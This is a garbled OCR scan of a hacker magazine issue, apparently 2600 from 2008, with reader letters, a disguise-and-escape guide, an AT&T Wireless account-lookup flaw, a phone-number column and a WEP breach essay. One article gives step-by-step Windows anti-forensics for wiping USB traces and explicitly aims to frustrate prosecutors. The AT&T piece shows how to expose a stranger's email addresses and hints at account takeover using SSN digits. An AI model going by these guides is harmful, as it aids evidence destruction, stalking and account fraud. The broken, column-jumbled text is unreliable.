You may be aski ng why I rosted on a LJ AE si te. I ' m
about as cl ose t o Arabi c as Mother Theresa i s t o Par i s
Hi l ton, but I wanted t o see how many h i ts I cou l d get .
Opport uni t i es al ways abound'
aurfal i en
Very few govprnments still beep when listening in
on you. le concerned when you hear nothing.
Dear 2600:
I l ove your publ i cat i on. I am s l i ght l y di saproi nted
wi t h the cover of 2 5 : 2 . Bei ng a rhotographer, I was
i nterested i n your cover photo. Bei ng a New Yorker, I
have to tel l you that the pi ct ure is pri nted backwards.
I f you need rroof, l et me know. Otherwi se, you can
send the t-s hi rt to me. ( I know that onl y publ i shed
s ubmi ssi ons rate a t-s hi rt but i t does not hurt to ask.
Thanks for l i steni ng. )
Manuel
It also doesn't hurt to answer and tell you that
we'd have to be insane to give out free shirts for every
letter we puh/ish. As for the photo, it's backwards for
a redson.
Dear 2600:
the or i gi nal photo, and i t seems to j ut i nto the mi ddl e
of 5th Avenue.
At any rate, n i ce j ob by Dabu Ch' wal d.
PF
Yes, you spotted somfthing else that was altered
about the photo: the old time radio building. W all
part of our dying technology theme tbis year.
Dear 2600:
Not tryi ng to reduce paranoi a of course, but every
t i me I look for your magazi ne at Barnes and Nobl e, i t
i s al ways up front a l ong wi t h other sma l l format maga
zi nes such as Make, etc.
Love your mag even though I don' t understand 90
percent of the more techni cal arti cl es.
Norm
Gratitude
Dear 2600:
Bei ng onl y 1 9 and al ready worki ng for a sma l l
computer company whi ch makes a program for
restaurants that use louch screens to do orders and
such, I j ust need to say that f i ndi ng your mag when I
was l i ke 1 4 has led me to a great career. So wi t h a l l
t h i s i n mi nd I want t o t hank you for a l l you have done
to hel p me be who I am today. Godspeed and keep
that i nformati on comi ng.
990.lm
It\ great to hcar that but give yourself the credit
for finding something that works for you. We're just
one of a variety of stimuli.
Dear 2600:
I ' m a new subscri ber to 2600, havi ng j ust recei ved
my second i ssup, 2 5 : 2 . Let me j ust say thanks for
havi ng the wherewi t hal !O sl i ck wi t h someth i ng for
such a l ong t i me. I remember heari ng about 260(
when I was j ust a wee l ad back i n the 80s.
Anyway, one of the more i nterest i ng parts of the
magazi ne (for me at l east) i s the l etters sect i on. I ' m
th i nki ng i t wou l d bp n i ce t o have a Letters sect i on
cal l ed "Moroni cs" or some such t hi ng, a spot where
you coul d put al l the usel ess, al t hough very entcr
tai n i ng l etters such as the one from Eva aski ng for
advi ce on how to obtai n a new i denti ty for her and
her daughter, or the one fr om "Z" compl ai ni ng about
the "ShopAt Home Sel ectRebates" crapware. I t wou l d
be n i ce not t o have t o sort through a l l the mundane,
"normal " l etters i n order to read t he real "cream" i f
you wi l l .
Short of that, keep on rocki n' !
Max@MVCT
We prefer to let our readers decide for themselves
who the morons are rather than have us label them so
definitively. That is, assuming we've ever gotten any
moronic letters at all.
Dear 2600:
Greetz from your northern nei ghbors i n Toronto,
Canada! I j ust enj oyed readi ng Aci devi l 's l etter i n 2 5 : 2
regardi ng your l i feti me subscri pti on offer. It made
me l augh because I too have consi dered the same
i ssues as to whether 2600 woul d l ast l ong enough to
make a l i fet i me subscri pti on worth i t or as to whether
the magazi ne woul d sti l l be awesome i n the post
Emmanuel Gol dstei n era.
I l ove the cover of the Summer 2008 i ssue. Can
you gi ve me ( us, i f anyone el se cares) more i nforma
t i on about the rhoto. Yes, i t's Manhattan, l ooki ng
sout h down Broadway from about 2 5t h Street. The
trol l eys and l ack of automobi l es date i t to the l ate
1 800s or poss i bl y ear l y 1 900s. But that bui l di ng on
the l eft that looks l i ke a radi o! That can't be part of
la
[C 2%a
[
aZnC
Here in Canada, i ncl udi ng taxes, I 've pai d as
much as $ 1 1 an i ssue, averagi ng about $ 1 0 an i ssue.
Ass umi ng 2600 l asts another 20 years, a l i fet i me
subscri pti on for me wou l d make t hat $3. 25 an i ssue,
whi ch i s awesome bang for the buck.
I am 22 years ol d now and have onl y had one
two-year subscri pti on to 2600. I 've been buyi ng
the magazi ne s i nce I was about 1 5, maki ng t hat 20
i ssues purchased at reta i l ( not i ncl udi ng my two ycar
subscri pti on) for a pri ce of $200 for 20 i ssues.
260( has been brought to court many t i mes, has
fel t pressure from corporat i ons and your powerfu I
( and i gnorant) government, and yet has stood the test
of t i me. You guys are sti l l around after i mmense pres
sures in the last 24 years and my bet i s that you' l l be
around for many more.
I real i ze that I don't want to be i n Aci devi l 's posi
t i on of havi ng spent more than needed on anyth i ng
( though I a l ready ki nd of am) . That bei ng s ai d, I 've j ust
purchased a l i fet i me subscri pti on and l ook forward to
readi ng 2600 unt i l I ' m an ol d man. I ' m al so pumped
up to read the fi rst t hree years of 2600 and have al so
j ust ordered The Best of 2600: A Hacker Odyssey
from amazon. ca and can l ook forward to recei vi ng
that i n the mai l t hi s week.
You guys have a bomb mag r unni ng. Let' s hope
not onl y for my 2 60 dol l ars' sake, but for the sake
of the free wor l d that you guys keep on trucki ng for
many more years to come.
Marcio
Dear 2600:
Fi rst of a l l , I woul d l i ke to say t hanks to a l l of the
peopl e who make 2600 poss i bl e: the staff, the wri ters,
and the supporters. I don't consi der mysel f a hacker,
but I ' m a computer geek wi t h a grand t hi rst for knowl
edge. The fi rst resources I turned to for l earn i ng about
the hacker communi ty were the I nternet and 2600.
Si nce I read the magazi ne rel i gi ousl y, i t woul d make
sense to subscri be, but I get more enj oyment out of
trekki ng to Barnes and Nobl e and buyi ng a copy. As
Rob G. menti oned i n i ssue 2 5 : 1 , workers at these
bookstores are qu i te fond of cover i ng up 2600 mags
wi t h other sl i ght l y l arger ones. I stand by the shel f for
a coupl e of mi nutes scanni ng the magazi ne to get the
usual react i ons. A l ot of peopl e stare at me, some
t i mes sneer, because the stereotypi cal "hacker" or
person i nterested i n anyth i ng to do wi th hackers i s a
whi te mal e. I am an Afr i can-Ameri can femal e. When
I purchase the mag, the cl erk i s ei ther fri endl y to me
and i ntentl y l ooki ng at the cover of 2600, or gi vi ng me
that "you're one of those i denti ty-steal i ng, chi l d-porn
di st r i but i ng fi l t h i es the news keeps tal ki ng abou!. " I
t h i nk i t's horr i bl e that peopl e choose to consi der these
stereotypes about hackers.
there was an entire agency somewhere dedicated to
visiting hookstores and hiding the most outrageous
titles bfhind othf'r 1f55 harmful ones. Well, we might
he a little surprised. But the point is that anyone can
do this dl its up to the resl of us to make sure it
doesn't succeed in silencing us or anyone else. Thanks
for having the strength to stick with us.
Dear 2600:
I j ust wanted to wri te to you guys to tel l you
how much I l ove your magazi ne. I t's the onl y wri tten
pi ece of l i terature i n exi stence that stays on topi c and
consi stent despi te the changi ng t i mes. My onl y wi sh i s
t hat I coul d have been al i ve at the start of al l t hi s. The
pi oneer i ng adventures i nto the el ectroni c unknown,
the di scoveri es that changed the way peopl e vi ew
computers al together, j ust the fact of havi ng nostal gi a
about t hese t i mes must be tru l y a wonder. I 've been
fasci nated by ol d and "outdated" technol ogy s i nce I
fi rst stumbl ed across the error fi l l ed ways of newer
morc "advanced and superi or" technol ogy *cough*
Vi sta *cough*. I l ove bri ngi ng ol d boxes back to l i fe
and maki ng them do t hi ngs they were never abl e to do.
I know I wi l l never be abl e to venture i nto the di gi tal
'
darkness to the extent of those who came before me
but I know that I can try. My motto i s that one cannot
appreci ate hi s present and be prepared for hi s futu re
if one does not understand hi s past. I t's hard to expl ai n
t o peopl e why I spend s o much t i me on "usel ess"
and "obsol ete" tech, especi al l y at the age of 1 7, but
despi te what peopl e say, I ' l l conti nue to do so. 26(O
al l ows me to l ook back i nto the mi nds of those brave
few who ventured ungu i ded i nto the myster i ous rea l m
of cyberspace. I t showed me that peopl e sti l l hol d the
torch of cur i osi ty and det(rmi nat i on. I was gi vi ng up
on human i ty as I saw us as a whol e becomi ng more
and more rei i ant on tech that was handed to us and
opt i mi zed for our i gnor ant demands. The peopl e
sl avi ng away at a keyboard spewi ng oUl programs thal
make our l i ves better were gi ven no voi ce unt i l now.
Anyone who had the courage to stand up for freedom
of speech and never hi de from thei r probl ems and
fears was thought, i n my mi nd, to be noth i ng more
t han a fai ry tal e and that those i ndi vi dual s wi l l never
exi st, unt i l I read a sma l l packet of pages h i dden i n the
back of some newspapers at a rundown newsstand
four years ago. One day I hope to buy a l l the maga
zi nes from the start to present day. I t won' t al l ow me
to experi ence the emoti ons and events fi rst hand but i t
mi ght hel p me wi t h connect i ng to my vague past.
I ' m not sure i f thi s message makes any sense or i f
i t wi l l ever be read. Or for t hat matter i f I am sendi ng
i t t o the r i ght address, but hey, I wrote what I trul y fel t
about t hi s magazi ne and i f no one reads i t then i t's
okay. J ust wanted to say t hank you .
Kiki dotstrange Sebastian
There: no question that we have a lot of enemies You actually have ventured into the past more than
in various places and their modus operandi is invari- most others simply by showing such an appreciation
ably to try and silenC those they disagree with or are for the technology and the sense of wonder that this
uneasy living on the same planet with. It's not entirely all started with. Having that link is essmtial for moving
fair to assume that only hookstore worker, are hehind forward and discovering new things. It's pr('ci,ely this
hiding our magazine. We wouldn't be surprised if attitude that makes what we do worthwhile.
ulumn 2d

la
[
C
by MasterChen
So, you fi nd you rsel f i n a pl ace where you
shou l dn' t be, and you need a qu i ck escape.
You ' ve stayed l ow profi l e and haven ' t stood
out too much, but you know that i f you went
out t he way you came i n, i t wou l d defi n i tel y
be s us pi ci ous. Whatever t he case may be, a
qu i ck di sgu i se wou l d a i d i n a safe escape.
Now, before we conti n ue, l et me remi n d you
t hat a l l i nfor mat i on can be used for good or
evi l , so what you do wi t h t h i s i s you r deci
s i on. I accept no responsi bi l i ty.
Wherever I go, I a l ways carry a back
pack wi th me t hat i s equ i pped wi th a few
i t ems. These i ncl ude a change of cl ot hi ng,
s u ngl asses, a razor, a hat, a wr i st watch, a
notebook wi t h pen or penci l , rea di ng mate
r i al ( your favor i te i ssue of 2600 maybe?),
: and prescr i pt i on or non-prescr i pt i on readi ng
gl asses. To effect i vel y di sgu i se you rsel f, you
need to change at l east si x feat u res about
you rsel f. I wi l l be descr i bi ng mysel f as an
exampl e for t hi s a rt i cl e j u st to demonstrate
what I am di scus s i ng.
Before look
Pr i or to goi ng t hrough any sort of transfor
mat i on, my typi cal appearance wou l d be a n
Asi an-Amer i can computer nerd wi t h a s haved
head, contact l enses, a l i ttl e faci a l st ubbl e,
j eans a nd a pl a i n t-s hi rt. I h ave a pretty pl a i n
descr i pt i on, bu t t hi s i s good. Why? When you
a re di sgu i s i ng you rsel f, you shou l d t h i n k as i f
you a re a bl ank page on an easel . Al l addi
t i ons a re deta i l s t hat h i de t he whi te space.
Afer look
Now, my hat i s cover i ng my shaved head.
My gl asses a l ter t he overal l s hape of my face,
whi ch i s a l so a bi t smoother now. My cl othes
a re compl etel y changed from what I started
wi t h, and the wr i st watch adds a l i tt l e extra
deta i l . Peopl e i n genera l do not h ave an eye
for deta i l , whi ch i s why you need to h ave t h i s
ski l l . Take t he t i me t o a na l yze you r feat u res
or trai ts. Then, see how wel l you can change
t hem on t he fl y. Can a nyone say Superma n?
Al l he di d was take hi s gl asses off.
The Next Step
Logi cal l y, the next t hi ng you need to do
i s get t he hel l out ! Pck you r th i ngs n i ce a nd
neat l y, a nd l eave i mmedi atel y. I t i s i mportant
to note here t hat t hi s i s a qu i ck di sgu i se used
for even qu i cker escapes. I f someone stares at
you l ong enough, i t can spel l di saster f or you.
How can you make a qu i ck escape wi t hout
ru n n i ng or even seemi ng l i ke you ' re i n a r ush?
Thi s i s wher e you r notebook or readi ng mate
r i al comes i nto pl ay. You can u se you r note
book and pen to wal k a round i n the genera l
di rect i on of you r exi t as if taki ng notes. Th i s
may add a l ook of author i ty t o you; hopefu l l y,
it wi l l be at l east enough not to be chal l enged
about you r presence. The readi ng mater i al
can be u sed t o make a n i ncr ementa l progres
si on to the door. I t may be c l i che i n movi es,
but j ust s i tt i ng down wi th you r di sgui se and
readi ng for a l i ttl e bi t can evade peopl e who
a re j u st pass i ng by. You don ' t h ave t o cover
you r face a nd cut out a hol e to see t hrough
you r mater i al . That ' s j ust nonsense.
Poi nts to Consider
There a re a few t hi ngs you mi ght want
The Change
to do to hel p make you r escape as easy and
I f you h ave t he opt i on t o go t o t he nearest
troubl e-free as possi bl e. Fi rst, try to avoi d
restroom, by al l means, take i t ! Here, you can
l eav i ng t he premi ses from t he s ame pl ace
take t he t i me to start fr om t he bottom up. I f I ' m
you entered. You r di sgu i se shou l d match you r
wear i ng pants, my change o f cl ot h i ng wou l d
envi ronment, s o i f you ' re i n a bus i ness envi -
u su a l l y cons i st of shorts. My t-sh i rt wou l d be
ron ment, cl othes t hat a re bus i ness to busi -
repl aced wi t h a short-sl eeve, button-down,
ness casua l wou l d be a wi se deci s i on. Pck
col l a red s h i rt. I wou l d u se t he razor to shave
as l i ght l y a nd as cheapl y as possi bl e. I f you
what l i ttl e stubbl e I had, and I ' d repl ace my
h ave t o d i tch your s uppl i es after t he transfor-
contacts wi t h my gl asses. F i na l l y, I put on my
mat i on, i t wou l d be best not to carry bra nd
hat a nd t he wr i st watch, a nd I a m ready to name i tems. And, fi na l l y, from begi n n i ng to
go. end, br i ng l i ttl e to no attent i on to yoursel f.
\. l
[C
d
2%
[
ZnC
Advanced Techniques
I f you have ever taken a for mal acti ng c l ass,
or i f you thi n k that you can pul l i t off, you can
try di sgui s i ng your demeanor as wel l . Thi s
can be done for exampl e wi t h a s l i ght l i mp
o r by hunch i ng whi l e you wal k. Whether or
not you need to tal k to anyone before you
l eave, you mi ght want to keep the i dea of
changi ng you r voi ce i nfl ect i on i n the back of
your mi nd. You r new voi ce can fi t you r new
personal i ty i f you want to take i t that far.
Last Words
Remember that di sgui ses a re subt l e, but at
the same t i me deta i l ed. An effecti ve d i sgui se
i s subt l e enough not to br i ng attenti on, but
detai l ed enough to evade fami l i ar i ty to
a nyone who saw you previ ous l y.
Suggested Readi ng
The Spy' s Guide: Ofce Espionage
Mind Manipulation by Dr. Haha Lung
Shout outs : #telephreak, #ca2600, #nv2600,
#infoinject, gid, bgm, sneaksy isfbf702,
chOpst 7 x, Yasumoto.
ATET Wi rgl g00
CU0tomgr InFormati on
by Frater Perdurabo
I got home from work l ast n i ght and saw an
odd number on my cal l er 1 0: " UNKNOWN
NAME, (81 2}- 1 23-4567. " As paranoi d as I am,
I put on my foi l hel met and deci ded to see
what I coul d do to fi nd out who the number
bel onged to. After vi si t i ng a handful of si tes
whi ch promi sed resul ts but whi ch I real l y
di dn't want to pay for, I deci ded to see what I
coul d do wi th the wi rel ess provi ders' websi tes
themsel ves.
I di dn't know whi ch provi der owned the
exchange, so I went through a few and found
t hat i t was owned by AT&T. Whi tepages . com
wi l l gi ve you some i nformati on about an
exchange, usua l l y i ncl udi ng t he c i ty and state
and somet i mes the provi der, so i t may be
worth a shot.
After a qui ck scan of the AT&T Wi rel ess
home page, I found out how to get the i nfor
mati on I wanted. Here's what to do:
Fi re up your web browser, go to
http://wireless. att . com/. and c l i ck
on "Si gn i n t o your account." Next, c l i ck the
"Get Started" l i n k for new user regi strati on.
The next page wi l l ask for "your"cel l phone
number. Put i n the AT& T cel l number that you
wou l d l i ke a l i ttl e more i nfo on, and one of a
few thi ngs wi l l happen:
3 . Or, i f the subscri ber has yet to regi ster,
you wi l l be di rected to a si gn- up page.
I n many cases, thi s wi l l i nc l ude one
or more of the ema i l addresses that
the subscri ber provi ded when he or
she began to contract wi th AT&T.
Obvi ousl y, thi s i s poor handl i ng of
customer i nformat i on. How many peopl e
do you know wi th an ema i l address
i n the format frstname_lastname1 2 3
-@provi der . com? I t turns out that thi s was
the case wi th the number i n questi on. I now
knew that my fi ance's former coworker had
cal l ed her, wonder i ng how she was doi ng. I
removed my t i nfoi l hat.
Addi t i onal l y ( and thi s is where t hi ngs can
get rea l l y fun), one onl y needs the l ast four
di gi ts of t he subscr i ber's soci al secur i ty number
to compl ete the regi strati on process and be
abl e to check the subscri ber's mai l , change
thei r voi cemai l password, or order addi t i onal
cr ap from AT&T t o be charged on thei r bi l l .
Whi l e I don't know where one wou l d be abl e
t o acqui re someone's SSN wi th onl y a n ame,
address, and phone number, I ' m s ure that at
l east one of you readers out there can l ead the
way. We're hackers, ri ght?
Wel l , that's about i t for now. I f anyone el se
has i nfo regardi ng other wi rel ess provi ders'
websi tes, feel free to submi t i t to 2600, or
maybe j ust bang your head aga i nst the wa l l s
of corporate pol i cy i n an attempt to tel l them
fi rst.
1 . I f the phone number i n quest i on i s
one of AT&T's prepai d "GoPhone"
numbers, you wi l l get a page wi t h
another l i n k and i nstruct i ons t o l og i n
t hrough the GoPhone portal .
2. I f t he subscr i ber has a l ready regi stered
Shout outs: Robert Anton Wilson, LSD,
thei r phone wi th the si te, you wi l l
Dr. Grof. And, remember, Barack Obama is
s i mpl y get a message to that effect. the only candidate to support Net Neutrality.
ulumn 2dl[
C
V
SeW( U Your
"oh I e Po(e tor
l(krqlo(ql ql (
by The Cheshi re Catal yst
cheshi re@2600. com
When putt i ng overseas tel ephone
numbers or US numbers you pl an to
cal l from overseas i nto the contact l i st or
the address book of your mobi l e phone,
pl ease put the pl us si gn,
"
+
"
, i n front of
the country code, rather than the US exi t
code of
"
01 1 .
"
The
"
+
"
si gn tel l s you r phone to use the
exi t code of the country you ' re i n . Wh i l e
i n the USA, thi s wi l l be
"
01 1 ,
"
but i n
Europe and other parts of the worl d, i t wi l l
be
"
00.
"
The phone wi l l check the current
network, and i nsert the appropri ate exi t
code. I f an exi t code i s not requi red
because you ' re i nsi de the country i n ques
ti on, the cal l wi l l go through as wel l .
When a fri end of mi ne rented a phone
on a recent t r i p to Chi na, I sent h i m a text
message. Hi s repl y came from
"
01 1 86
"
pl us hi s l ocal number. My message to
h i m came from
"
00 1 NPA NXX XXXX
"
.
I n other words, each networ k showed the
user the Exi t Code requ i red to reach the
other party from the networ k they were
i n. The
"
+
"
si gn does the same job but
does n' t need to be changed when you
cross borders .
a l l had di fferent requi rements for how
someone accessed I nternati onal Di rect
Di al i ng. What was di al ed was l eft to each
nat i onal agency, but how to represent i t
was deci ded upon by the I TU.
Th i s works pretty wel l , unt i l you fi nd
that i n Bri tai n, they di al "0
"
for a l ong
di stance cal l and
"
00
"
for an i nternat i onal
cal l . The probl em was represent i ng both
schemes. So the zero i n parenthesi s was
establ i shed. A London number wou l d be
represented as +44 (0) 845 555 2368,
where the ( 0) wou l d onl y be used wi th i n
Great Bri tai n, a n d dropped i f di al ed from
outsi de the country.
Th i s confl i cts a bi t wi th the Ameri can
method of pl aci ng the NPA ( Numberi ng
Pl an Area, better known as an area code)
i n parenthes i s . The NPA whi ch does n' t get
di al ed i f you are wi th i n i ts geographi cal
area. The other probl em that came about,
of course, was over l ayi ng two or more
NPAs wi th i n a s i ngl e geographi cal area.
So, our Bri ti sh fr i end shou l d be
programmed i n your phone as: +44 845
5 5 5 23 68, and our Ameri can fri ends
shou l d be programmed as +1 3 1 1 555
2368
You can put your phone numbers i nto
your mobi l e phone wi th or wi thout the
dash characters. Some phones put them
i n for you, but the I TU standard i s to use
spaces.
The Cheshire Catalyst (Richard
Cheshire) is the former publisher of the
notorious TAP Newsletter of the 7 9705
and 80s. He has also attended and volun
teered at every HOPE Conference we' ve
ever held.
Thi s use of the pl us si gn started back
i n the 1 970s, when i nternat i onal busi
nessmen went to pr i nt thei r phone numbers
on thei r busi ness cards. The I nternati onal
Tel ecommun i cati ons Un i on, an agency
of the Un i ted Nati ons, publ i s hed a stan
dard for how phone numbers were t o be
represented. They real i zed that the PTTs
( post, Tel ephone and Tel egraph) agenci es
of member states where governments
ran the tel ecom agenci es and the RPOAs
( Recogni zed Pri vate Operat i ng Agenci es)
where pr ivate compan i es ran the works
Shout out: The mAltman.
la
[C
2%a
[
aZnC
. , M . .
&uO[@[O(
by bri atych
Disclaimer: The information provided in this
article is provided for educational purposes only;
please do not use this information for illegitimate
exploits. This article will show you how to eliminate
USB traces for Windows 2000 and Windows XP
machines.
During criminal investigations, forensic
examiners commonly analyze USB activities. In
fact, this sort of analysis is probably one of the
very first procedures an investigator will perform
during an investigation. When a USB removable
device is connected to a system, information
about that device is left in log files and in
Windows registry entries, making very it easy for
investigators, with or without forensic software,
to identify USB devices such as flash drives, hard
drives, iPods, and other electronic devices and
for them to trace USB activity. When a device is
connected, the Windows PnP manager queries the
device's firmware and records the manufacturer
information into the registry. This is done in order
to locate the proper device driver. This process
creates several artifacts which the forensic
examiner can later discover. First, the as records
this information in the s e tupapi . l og located
in the operating system's default installation
directory; i. e. , C : \ WINNT\ s etupapi . l og
on Windows 2 000 and ' ! \ Wi ndows \ s e tu
-papi . l og on Windows XP. Second, the as
will create a registry entry under the HKEY_
-LOCAL_MACHI NE \ S YS TEM \ C u r r e n t Con
-trol Set \ Enum \ USBSTOR key.
In addition, event log entries are recorded in
the Event Viewer. For Windows 2000 machines,
event IDs 1 34, 1 3 5, and 1 60 are associated
with USB removable devices. Event 1 0 1 34 is
recorded when a USB device is connected to
the computer, Event 1 0 1 3 5 is recorded when a
USB device is disconnected from the computer,
and Event 1 0 1 60 is recorded when a USB device
is disconnected from the computer using the
Unplug or Eject Hardware feature. Additionally,
some system ( . sys) , dynamic link library ( . dl l) ,
and executable ( . exe) files are also accessed,
leaving remnants of USB activity throughout the
system.
From time to time, and for legitimate security
reasons, a user may need to eliminate USB traces
from a computer system. If you find yourself in
this situation, the best way to go about doing this
is described as follows:
1 . Open up Windows Event Viewer. Right click
on the System Log and select "Clear All Events."
Since you are already there, you might as well
clear out the Application and Security Logs.
2. Locate the s e tupapi . l og file. Make
sure not to delete this file; deleti ng this file may
allow the forensic examiner to recover it. The best
approach is to open the file using a text editor
such as notepad, delete the information within
the file by selecting its entire content of the file
and deleting it, and then save the fi le.
3. Next, open the Windows registry editor.
Navigate to the Curren tCon t rol S e t \ Enum
and delete the USBSTOR registry key. Do the
same for all ControlSets ( CurrentCont rol Set ,
Cont rol Se t O O l , Contro l S e t 0 0 2 , and so on) .
Do not delete any other registry key, as this would
make it obvious that someone was tampering
with the registry. I f you delete only the USBSTOR
key, an examiner may instead assume that no USB
device was connected to the system.
4. While still in the Windows registry, delete
the registry key labeled "Mounted Devices."
However, make sure to restart the computer
afterwa rds. This will cause the system to recreate
a new mounted device list; otherwise, this could
raise a flag to the investigator as well.
5. Last, try running a full system virus scan,
as this program will update all files' last access
date. This will eliminate the issue with the last
accessed dates of specific files such as "usbstor.
sys" and "hotplug.dll" which a re analyzed during
criminal investigations.
It is important to point out t hat there are
further remnants left throughout the system;
however, these are not well-known to the
average examiners, and probably not even to
advanced examiners. You can go the extra mile
by deleting the content of the dl l c ache and
pre f e t ch folders, and then running a full system
maintenance routine: delete temporary files, run
a disk defragmenter, and so on. With the above
procedures you can make it very difficult for a
prosecutor to substantiate a case based on forensic
evidence of USB activity. In criminal cases,
prosecutors can argue spol iation of evidence if
they can show wit hholding, hiding, or destruction
of evidence relevant to a legal proceeding. This is
easy to argue if someone destroys or wipes a hard
drive; however, it's more difficult for prosecutors
to make such a showing when a routine cleaning
and maintenance was performed in order !
improve system performance.
ulumn 2d l[
CO
Wi rel ess v u l nera bi l i t i es a ren't dead. We J ust how weak is WEP? Wi th modern
j ust stopped watchi ng.
attacks (ai rcrack-ptw) and a s i ngl e associ ated
I ' m s ure we a l l t hought we were done
cl i ent (needed to get an ARP frame), a WEP
wi t h t hi s one - can there rea l l y be much more
key can be cracked i n about two mi nutes
to be s ai d about open wi rel ess networks?
(regardl ess of 64 or 1 28 bi t WEP). By captur i ng
Haven't we r i dden t hat one off i nto t he s unset
and re- i nj ecti ng an ARP frame t housands of
once and for a l l ? Apparent l y not, s i nce whi l e
t i mes, col l ect i ng enough encrypted data to
we were a l l recover i ng from HOPE (or goi ng
der i ve t he key becomes tri vi a l . Other attacks
to Defcon), a credi t card theft ri ng l everagi ng
v u l nerabl e wi rel ess networks was busted
i mpl emented i n the a i rcrack- ng s ui te expose
for stea l i ng tens of mi l l i ons of credi t card
other fl aws i n t he WEP protocol , renderi ng
n u mbers a l ong wi t h customer i nfor mati on.
near l y any network
usi ng WEP for protect i on
El even members of a n i nternat i ona l
vu l nerabl e. Th i s mi ght not be a bi g deal for a
credi t card r i ng were charged i n Boston wi t h
home user - genera l l y noth i ng you're doi ng
stea l i ng over 41 mi l l i on credi t card n u mbers i s l i kel y to be i nterest i ng enough to be worth
from maj or u. s. retai l ers l i ke Boston Market,
cracki ng WEP and i t's easi er to move on to
Barnes and Nobl e, DSW, a nd the hi ghl y
a n open networ k i f al l you're l ooki ng for i s
publ i ci zed TJ Maxx. Sou nd fami l i ar ? Th i s i s
I nternet access t o check ema i l . For a corpora
basi ca l l y t he same as t he att ack on Lowes
t i on hand l i ng personal i nfo and credi t cards,
Hardware, where three men pl ed gui l ty
s i mpl e WEP i s h ugel y i nsuffi ci ent .
to i nsta l l i ng s ni ffer software vi a t he wi re-
Whi l e WEP has been the basi s for a l l of
l ess network to capt ure credi t card data.
R b th t tt k' N t I I ' M b
these attacks, none of t hem have t ru l y rel i ed
emem er a a ac ! I rea y! ay e
beca se t h appened t I5 ago Seems
on t he wi rel ess network; t he l i on's s hare
u | /I UI y a .
l i ke a l ot of peopl e forgot about i t . What makes
of the bl ame fa l l s on an apparent l y wi de
t he l atest att ack u n i que i s t hat, u n l i ke t he
open network desi gn i nsi de t he retai l ers.
attempt at Lowes, thi s was both s uccessfu l at
Combi n i ng t he weakness of WEP wi t h a
capt ur i ng credi t card i nfor mat i on, a nd i nter-
poor i nterna l networ k desi gn wi l l rarel y end
nat i onal l y orga n i zed, sendi ng t he credi t card wel l . Some handhel d i nventory devi ces can
i nfor mat i on overseas t o servers i n Ukrai ne,
onl y speak WEP, not havi ng the computa-
Chi na, and Latvi a.
t i ona I power t o s upport stronger encrypt i on
How does t hi s keep happen i ng? Probabl y
methods. But u nt i l these a re phased out, i t's
t he us ual : a combi nat i on of no (or obvi ous l y
cr i ti cal t hat t he wi rel ess networ k i s treated
i ns uffi ci ent) networ k secu r i ty, and i nsuf-
as a host i l e, exter nal networ k. There shou l d
fi ci ent segregat i on of t he i nter nal networ k.
be no r eason for a wi rel ess u ser to di rectl y
Forget "cr u nchy on t he out si de, chewy i n t he
i nterface wi t h t he networ k hol di ng the poi nt
center. " We're l ooki ng at sponge- l i ke porosi ty
of t he networ k per i meter. Both t he Lowes
of-sal e systems for credi t card processi ng.
att ack a nd t hese recent ones rel i ed not onl y
But i n a l l of these cases, t he real wor k was
on a weak outer l ayer of secu ri ty, but on an
done by a s ni ffer i nsta l l ed on t he compani es'
u n st r uct ured i nterna l networ k where wi rel ess
systems hand l i ng credi t card dat a. The wi re-
u sers a re a l l owed access to t he poi nt-of-sal e
l ess networ k was u sed onl y as a j u mpi ng-off
networ k. poi nt for i nfect i ng t he rest of t he networ k.
l[C 2 2%
[
ZnC
Of cou rse, we can't l ay a l l of t he bl ame on
t he compr omi sed compan i es . . . t he PCI DSS
(payment Card I ndustry Data Storage Sta n
dard) recommends agai nst us i ng WE P, but
a l l ows i t i f addi t i onal secu ri ty mechani s ms
a re i n pl ace - or i f i t i s 1 04 bi t WE P wi t h a
2 4 bi t IV (aka good ol d fas hi oned WE P l i ke
we've a l ready broken) , MAC address fi l ter i ng
(real l y? ) , and rotat i ng WEP keys quarter l y
(that's 1 70 days versus about two mi nutes
to crack the new key). A company fol l owi ng
these gu i del i nes to the l etter can sti l l be
massi vel y exposed.
I t's tempti ng to di s mi ss a l l of t hi s as corpo
rate l evel cr i me wi th no i mpact on any of us.
Sure, there's the obvi ous upfront costs - rei s
s u i ng and repl aci ng the credi t car ds, dea l i ng
wi t h the fraudu l ent i tems on t he bi l l s, i tems
bei ng ordered to new addresses tri ppi ng
a l a rms - and I 'd be done wr i t i ng about t hi s
r i ght there, except for two key poi nts t hat a re
( l argel y) over l ooked:
Fi rst: Most retai l ers offer t hei r own
bra nded credi t cards, and del i ght i n tryi ng to
get you to si gn up for them when you make a
purchase. At t he poi nt-of-sa l e termi na l . Wi th
i nstant credi t checki ng and va l i dat i on. The
i nformat i on used to si gn u p for the card has
to be trans mi tted to the credi t card company
somehow. Whi l e none of the a rt i cl es ment i on
what "personal i nformati on" beyond credi t
car d nu mbers was compromi sed, i t wou l d
seem perfectl y pl aus i bl e t hat enough i nfor
mat i on to appl y for new cards at a di fferent
address was gathered. Most peopl e readi ng
2600 ought to be savvy enough not to expose
t hei r personal i nformat i on casu a l l y. Phi s hi ng
attacks are pretty transparent, and i dent i ty
steal i ng troj ans a re fa i rl y easy to avoi d. But
when t he company i ssu i ng t he credi t card
can't be t rusted to secu re t he i nfor mat i on, the
ga me changes s i gni fi cant l y.
Second: "What is you r favori te col or ? "
"What school di d you graduate from? "
"What i s you r home town? " Sou nd fami l i ar?
Sou nd l i ke t he sort of questi ons asked when
cha ngi ng t he b i l l i ng address on a credi t
card? Sou nds a l ot l i ke what most peopl e
don't t hi n k twi ce about putt i ng on a soci a l
networki ng si te (rhymes wi t h " Pi e Face") ,
too. The t hi eves who steal credi t card data
i n bu l k wou l d never bother to i dent i fy i ndi
vi dual s. The fi nal consu mers of t he stol en
credi t car d n u mbers a re now i n possessi on of
t he accou nt n u mber, expi rat i on deta i l s, fu l l
name, and, i f you h ave a n on l i ne presence
wi t h any i dent i fi abl e i nfor mat i on, potent i a l l y
enough data t o change you r b i l l i ng a n d sh i p
pi ng addresses wi t hout you r knowl edge.
A br i ef search t hrough soci a l networ ki ng
si tes showed no shortage of ment i ons of home
towns, h i gh school s, favori te col ors (ei t her
expl i ci t l y or guessed vi a t he genera l t heme
of t he page) , favor i te bands - a l l of wh i ch,
combi ned wi th stol en credi t card deta i l s,
cou l d be suffi ci ent for compl ex fraud.
So pl ease: Stop u s i ng WE P. Now. Let i t
di e. And desi gn you r networks so t hat t hey
have more t han one l ayer of secur i ty.
< ?php
echo UO YOUT wD UUN OTVlCO USlDg ;
by gl i der
The Probl em
